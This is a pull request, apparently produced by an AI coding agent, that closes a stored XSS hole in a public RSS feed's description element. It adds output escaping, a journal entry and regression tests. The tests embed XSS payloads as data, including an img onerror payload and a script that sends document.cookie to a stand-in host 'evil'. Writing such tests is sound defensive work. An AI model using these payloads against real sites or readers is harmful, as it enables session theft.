### PR TITLE
fix(security): HTML-escape per-item &lt;description&gt; to close stored XSS

### DIFF
--- a/.jules/sentinel.md
+++ b/.jules/sentinel.md
@@ -1,5 +1,57 @@
 # Sentinel's Journal
 
+## 2026-05-25 - Stored HTML/JS Injection (XSS) in Published `<description>` — Unescaped Sibling of the `<content:encoded>` Output-Encoding Fix
+
+**Vulnerability:** The 2026-05-24 round HTML-escaped the `<content:encoded>`
+CDATA body but EXPLICITLY left the per-item `<description>` XML text node
+unescaped, with the comment *"``desc_text`` below is for the `<description>`
+XML text node and is left unescaped — ElementTree applies the correct XML
+escaping there."* That reasoning conflates XML-**structural** safety with
+HTML-**rendering** safety — the exact confusion the 2026-05-24 entry itself
+diagnosed for `<content:encoded>`. `<description>` is rendered as HTML by the
+overwhelming majority of RSS readers (RSS 2.0 convention; `content:encoded`
+was added only to carry the *full* body). The same upstream
+`&lt;img src=x onerror=…&gt;` that `html_to_text`
+(`HTMLParser(convert_charrefs=True)`) decodes into a LIVE `<img onerror=…>`
+in `summary` (`src/build_feed.py:_format_item_content`) flows unescaped through
+`_compose_description` → `desc_text_truncated` → `<description>`.text
+(`_emit_item`). ElementTree escapes `<>&` exactly ONCE for XML
+well-formedness; a conformant reader XML-decodes that node exactly once →
+`<img onerror=…>` → and (rendering description as HTML) executes it. Stored
+XSS on the public feed (`https://origamihase.github.io/wien-oepnv/feed.xml`),
+the direct sibling of the `<content:encoded>` vector. `_sanitize_text`
+(`_CONTROL_RE`) strips only invisible/control/BiDi/zero-width chars and NEVER
+`<` (0x3C) / `>` (0x3E), so it never closed this. Confirmed by an end-to-end
+PoC (`tests/test_description_html_injection.py`) that drives the real
+`_emit_item`, serialises the actually-published `<description>` element to XML,
+re-parses it (the reader's single XML-decode), then HTML-renders the result
+with a reader-accurate `HTMLParser(convert_charrefs=True)`: pre-fix the live
+`img` / `script` start tag + the `onerror` event-handler attribute survive
+(`live_tags == ['img']` / `['script']`); post-fix the bytes are inert escaped
+source (`&lt;img…&gt;`).
+
+**Learning:** Output-encoding must cover EVERY field a reader renders as HTML —
+not just the one CDATA field. The fix is contextual output-encoding AT THE
+SINK: `html.escape(formatted.desc_text_truncated, quote=False)` on the
+`<description>` `ET.SubElement` in `_emit_item` — the single per-item
+`<description>` sink for BOTH the DE and EN feeds (`_emit_item` is invoked once
+per language with the language-resolved `FormattedContent`, so one escape
+covers both). Escaping at the SINK (not inside `_compose_description`, where the
+2026-05-24 `desc_html` fix lives) keeps `desc_text_truncated` PLAIN display text
+so the WL directional-`>` markers, line-prefix logic and truncation tests keep
+operating on the unescaped form — the XML-text-node-rendered-as-HTML encoding
+belongs to the sink that *knows* the rendering context (textbook contextual
+output-encoding). CDATA-HTML bodies pre-encode at composition (the body is
+*built* as HTML there); XML-text-node-rendered-as-HTML fields encode at their
+element sink. The general rule from 2026-05-24 — *"every sink that renders its
+output as HTML must HTML-escape it"* — had enumerated ONLY `<content:encoded>`;
+`<description>` is the second member and was hiding behind ElementTree's XML
+escaping. The named "plain-text-into-raw-HTML/CDATA audit walker" watch-list
+item now has TWO confirmed members; a future generic walker must enumerate both
+(a) CDATA HTML bodies AND (b) XML text nodes whose RSS element name is
+HTML-rendered by convention (`description`, `content:encoded`) — the latter is
+the trap, because ElementTree silently makes the XML *look* safe.
+
 ## 2026-05-24 - Stored HTML/JS Injection (XSS) in Published `<content:encoded>` via `html_to_text` Entity Double-Decode
 
 **Vulnerability:** `_compose_description` (`src/build_feed.py`) built the

--- a/src/build_feed.py
+++ b/src/build_feed.py
@@ -3536,9 +3536,11 @@ def _compose_description(summary: str, time_line: str) -> tuple[str, str]:
     # ``HTMLParser(convert_charrefs=True)``, so a compromised/MITM'd upstream
     # could otherwise land an executable tag in subscribers' readers. Escape
     # each text part for the HTML context; only the builder's own structural
-    # ``<br/>`` separators stay live. ``desc_text`` below is for the
-    # ``<description>`` XML text node and is left unescaped — ElementTree
-    # applies the correct XML escaping there.
+    # ``<br/>`` separators stay live. ``desc_text_truncated`` below stays PLAIN
+    # display text here (so the WL directional ``>`` markers, line-prefix logic
+    # and truncation tests keep operating on the unescaped form); contextual
+    # output-encoding for it happens at its HTML-rendered ``<description>`` sink
+    # in :func:`_emit_item`.
     desc_html = "<br/>".join(html.escape(part, quote=False) for part in desc_parts)
     desc_text = " ".join(desc_parts)
     if len(desc_text) > feed_config.DESCRIPTION_CHAR_LIMIT:
@@ -3973,7 +3975,23 @@ def _emit_item(
         ET.SubElement(item, "{https://wien-oepnv.example/schema}ends_at").text = _fmt_rfc2822(ends_at)
 
     # Description
-    ET.SubElement(item, "description").text = formatted.desc_text_truncated
+    # Security (stored HTML/JS injection on the public feed — ``<description>``
+    # sibling of the ``<content:encoded>`` output-encoding fix): ``<description>``
+    # is an XML TEXT node, so ElementTree escapes ``<>&`` for XML *well-formedness*
+    # on serialise. That alone is NOT enough — a conformant RSS reader XML-decodes
+    # the node exactly ONCE and the overwhelming majority then render the result
+    # as HTML (RSS 2.0 ``<description>`` is HTML by convention; ``content:encoded``
+    # was added only to carry the *full* body). ``desc_text_truncated`` carries
+    # plain display text in which an upstream ``&lt;img onerror=…&gt;`` has already
+    # been decoded by ``html_to_text`` into a live ``<img onerror=…>``; without
+    # output-encoding here that tag would execute in the subscriber's reader after
+    # its single XML-decode. HTML-escape at this sink so the reader's lone
+    # XML-decode yields inert ``&lt;img…&gt;`` *source* text. This is the single
+    # per-item ``<description>`` sink for both the DE and EN feeds (``_emit_item``
+    # is invoked once per language with the language-resolved ``formatted``).
+    ET.SubElement(item, "description").text = html.escape(
+        formatted.desc_text_truncated, quote=False
+    )
 
     # content:encoded
     ET.SubElement(item, "{http://purl.org/rss/1.0/modules/content/}encoded").text = PH_CONTENT

--- a/tests/test_description_html_injection.py
+++ b/tests/test_description_html_injection.py
@@ -1,0 +1,162 @@
+"""Stored HTML/JS injection (XSS) in the published per-item ``<description>``.
+
+Threat model (project Zero-Trust upstream contract, AGENTS.md §3): a
+compromised / MITM'd transit API serves an item ``description`` carrying
+entity-escaped angle brackets, e.g. ``&lt;img src=x onerror=...&gt;`` (the
+literal form for JSON providers; the double-escaped ``&amp;lt;...`` form for
+XML providers that survives one XML-decode layer).
+
+``html_to_text`` runs the description through ``HTMLParser(convert_charrefs=
+True)``, which DECODES those entities back into live ``<`` / ``>`` characters
+in its *plain-text* output. That plain text becomes ``summary`` and flows into
+``_compose_description`` -> ``desc_text_truncated`` -> the per-item
+``<description>`` element (``src/build_feed.py:_emit_item``).
+
+``<description>`` is an XML TEXT node, so ElementTree escapes ``<>&`` for XML
+well-formedness on serialise. That is the trap the sibling ``<content:encoded>``
+fix (2026-05-24) explicitly left open with the comment *"ElementTree applies
+the correct XML escaping there"*: a conformant RSS reader XML-decodes the node
+exactly ONCE and the overwhelming majority then render the result as HTML (RSS
+2.0 ``<description>`` is HTML by convention). After that single XML-decode the
+escaped ``&lt;img onerror=...&gt;`` becomes the live ``<img onerror=...>`` and
+executes in the subscriber's reader.
+
+The fix HTML-escapes the body at the ``<description>`` sink in
+:func:`_emit_item` (contextual output-encoding for the XML-text-node-rendered-
+as-HTML context) so the reader's lone XML-decode yields inert ``&lt;img...&gt;``
+*source* text. ``_emit_item`` is the single per-item ``<description>`` sink for
+both the DE and EN feeds.
+"""
+
+from __future__ import annotations
+
+import xml.etree.ElementTree as ET
+from datetime import UTC, datetime
+from html.parser import HTMLParser
+from typing import Any, cast
+
+from src import build_feed as bf
+from src.feed_types import FeedItem
+
+_NOW = datetime(2026, 5, 25, 12, 0, tzinfo=UTC)
+
+
+class _ReaderModel(HTMLParser):
+    """Render a ``<description>`` body the way a feed reader would.
+
+    ``convert_charrefs=True`` mirrors real reader/browser behaviour: an
+    entity-escaped ``&lt;img&gt;`` decodes to *visible text*, never to a live
+    tag, whereas a raw ``<img>`` is parsed as an executable element.
+    """
+
+    def __init__(self) -> None:
+        super().__init__(convert_charrefs=True)
+        self.live_tags: list[str] = []
+        self.event_handler_attrs: list[tuple[str, str]] = []
+        self._text: list[str] = []
+
+    def handle_starttag(
+        self, tag: str, attrs: list[tuple[str, str | None]]
+    ) -> None:
+        self.live_tags.append(tag)
+        for name, _value in attrs:
+            if name.lower().startswith("on"):
+                self.event_handler_attrs.append((tag, name.lower()))
+
+    def handle_startendtag(
+        self, tag: str, attrs: list[tuple[str, str | None]]
+    ) -> None:
+        self.handle_starttag(tag, attrs)
+
+    def handle_data(self, data: str) -> None:
+        self._text.append(data)
+
+    @property
+    def visible_text(self) -> str:
+        return "".join(self._text)
+
+
+def _published_description_textnode(description: str) -> str:
+    """Return the ``<description>`` content as the reader's XML parser sees it.
+
+    Drives the real per-item builder (``src/build_feed.py:_emit_item``),
+    serialises the actually-published ``<description>`` element to XML bytes,
+    then re-parses them so the returned string is what a reader gets *after its
+    single XML-decode* — i.e. the exact input handed to HTML rendering.
+    """
+    state: dict[str, dict[str, Any]] = {}
+    item = cast(
+        FeedItem,
+        {
+            "title": "Streckeninformation",
+            "link": "https://example.com/incident",
+            "description": description,
+            "guid": "incident-1",
+            "source": "ÖBB",
+            "starts_at": datetime(2026, 5, 24, tzinfo=UTC),
+        },
+    )
+    _ident, element, _replacements = bf._emit_item(item, _NOW, state)
+    desc_el = element.find("description")
+    assert desc_el is not None
+    published_xml = ET.tostring(desc_el, encoding="unicode")
+    decoded = ET.fromstring(published_xml).text  # reader's single XML-decode  # noqa: S314
+    return decoded or ""
+
+
+def _render(body: str) -> _ReaderModel:
+    reader = _ReaderModel()
+    reader.feed(body)
+    reader.close()
+    return reader
+
+
+def test_entity_escaped_img_onerror_is_inert_in_description() -> None:
+    payload = "&lt;img src=x onerror=alert(document.domain)&gt; Strecke gesperrt"
+    decoded = _published_description_textnode(payload)
+    reader = _render(decoded)
+
+    # No executable tag / event handler may survive into the rendered HTML.
+    assert "img" not in reader.live_tags
+    assert reader.event_handler_attrs == []
+
+    # The reader's XML-decoded view is inert escaped source, not a live tag.
+    assert "<img" not in decoded
+    assert "&lt;img" in decoded
+    assert "Strecke gesperrt" in reader.visible_text
+
+
+def test_double_escaped_script_is_inert_in_description() -> None:
+    payload = "&lt;script&gt;fetch('//evil/?'+document.cookie)&lt;/script&gt; Info"
+    decoded = _published_description_textnode(payload)
+    reader = _render(decoded)
+
+    assert "script" not in reader.live_tags
+    assert "<script" not in decoded
+    assert "&lt;script&gt;" in decoded
+    assert "Info" in reader.visible_text
+
+
+def test_legitimate_ampersand_renders_correctly_in_description() -> None:
+    # Happy path: a literal '&' is correctly carried so an HTML-rendering
+    # reader displays '&' (not a broken/eaten entity) and no tag is injected.
+    decoded = _published_description_textnode("Wien & Graz gesperrt")
+    reader = _render(decoded)
+
+    assert reader.live_tags == []
+    assert reader.event_handler_attrs == []
+    assert "Wien & Graz gesperrt" in reader.visible_text
+
+
+def test_published_description_textnode_is_html_escaped_at_sink() -> None:
+    # Sink-level guard: the published <description> text node carries the
+    # HTML-escaped form of an injected tag so that the reader's single
+    # XML-decode cannot reconstitute a live element. ``desc_text_truncated``
+    # itself stays plain text (the directional-marker / truncation tests rely
+    # on that); the encoding is applied at the _emit_item sink.
+    # Entity-escaped upstream form: html_to_text decodes ``&lt;b&gt;`` to the
+    # literal ``<b>`` *text* that survives into the description body (a real
+    # ``<b>`` tag would instead be stripped as markup by html_to_text).
+    decoded = _published_description_textnode("&lt;b&gt;x&lt;/b&gt; upstream")
+    assert "<b>" not in decoded
+    assert "&lt;b&gt;x&lt;/b&gt;" in decoded


### PR DESCRIPTION
## Summary

Closes a **stored HTML/JS injection (XSS)** in the published per-item `<description>` of the public RSS feed — the direct sibling of the `<content:encoded>` fix shipped on 2026-05-24.

That round output-encoded `<content:encoded>` but **explicitly left `<description>` unescaped**, with the comment *"ElementTree applies the correct XML escaping there."* That reasoning conflates XML-**structural** safety with HTML-**rendering** safety:

- `<description>` is an XML text node, so ElementTree escapes `<>&` exactly **once** for XML well-formedness.
- A conformant RSS reader XML-decodes that node exactly once, and the overwhelming majority then render the result **as HTML** (RSS 2.0 `<description>` is HTML by convention; `content:encoded` was added only to carry the *full* body).
- The same upstream `&lt;img src=x onerror=…&gt;` that `html_to_text` (`HTMLParser(convert_charrefs=True)`) decodes into a **live** `<img onerror=…>` inside `summary` flows unescaped into `desc_text_truncated` → `<description>`.text. After the reader's single XML-decode it becomes `<img onerror=…>` and **executes**.

`_sanitize_text` (`_CONTROL_RE`) strips only invisible/control/BiDi/zero-width characters and never `<` / `>`, so it never closed this vector.

## Fix

Contextual output-encoding **at the sink** — `html.escape(formatted.desc_text_truncated, quote=False)` on the `<description>` `ET.SubElement` in `_emit_item`:

- `_emit_item` is the single per-item `<description>` sink for **both** the DE and EN feeds (invoked once per language with the language-resolved `FormattedContent`), so one escape covers both.
- Escaping at the sink (not in `_compose_description`, where the `desc_html` fix lives) keeps `desc_text_truncated` as **plain display text**, so the Wiener-Linien directional-`>` markers, line-prefix logic and truncation tests keep operating on the unescaped form. The XML-text-node-rendered-as-HTML encoding belongs to the sink that knows the rendering context.
- After the fix: builder emits `&amp;lt;img…&amp;gt;` → reader XML-decodes to `&lt;img…&gt;` → HTML-renders as inert visible text. Legitimate content (e.g. `Wien & Graz`, `A > B`) still displays correctly in HTML-rendering readers.

## Proof of Concept

`tests/test_description_html_injection.py` drives the **real** `_emit_item`, serialises the actually-published `<description>` element to XML, re-parses it (the reader's single XML-decode), then HTML-renders the result with a reader-accurate `HTMLParser(convert_charrefs=True)`:

- **Pre-fix:** the live `img` / `script` start tag + the `onerror` event-handler attribute survive (`live_tags == ['img']` / `['script']`).
- **Post-fix:** the bytes are inert escaped source (`&lt;img…&gt;`); no live tags, no event handlers.

## Test plan

- [x] PoC fails on pre-fix code (3 exploit/sink tests), passes after the fix
- [x] Full test suite: **8502 passed, 2 skipped, 0 failed**
- [x] `python scripts/run_static_checks.py` — ruff, mypy, bandit, secret scanner, **C901 gate (0 new violations)**, i18n gate, pip-audit all green
- [x] No new functions added to the C901 allowlist
- [x] Existing `<content:encoded>` injection test and directional-marker / truncation tests remain green (unchanged)

https://claude.ai/code/session_01AJwrN7xNsKfaB7ocNx578Y

---
_Generated by [Claude Code](https://claude.ai/code/session_01AJwrN7xNsKfaB7ocNx578Y)_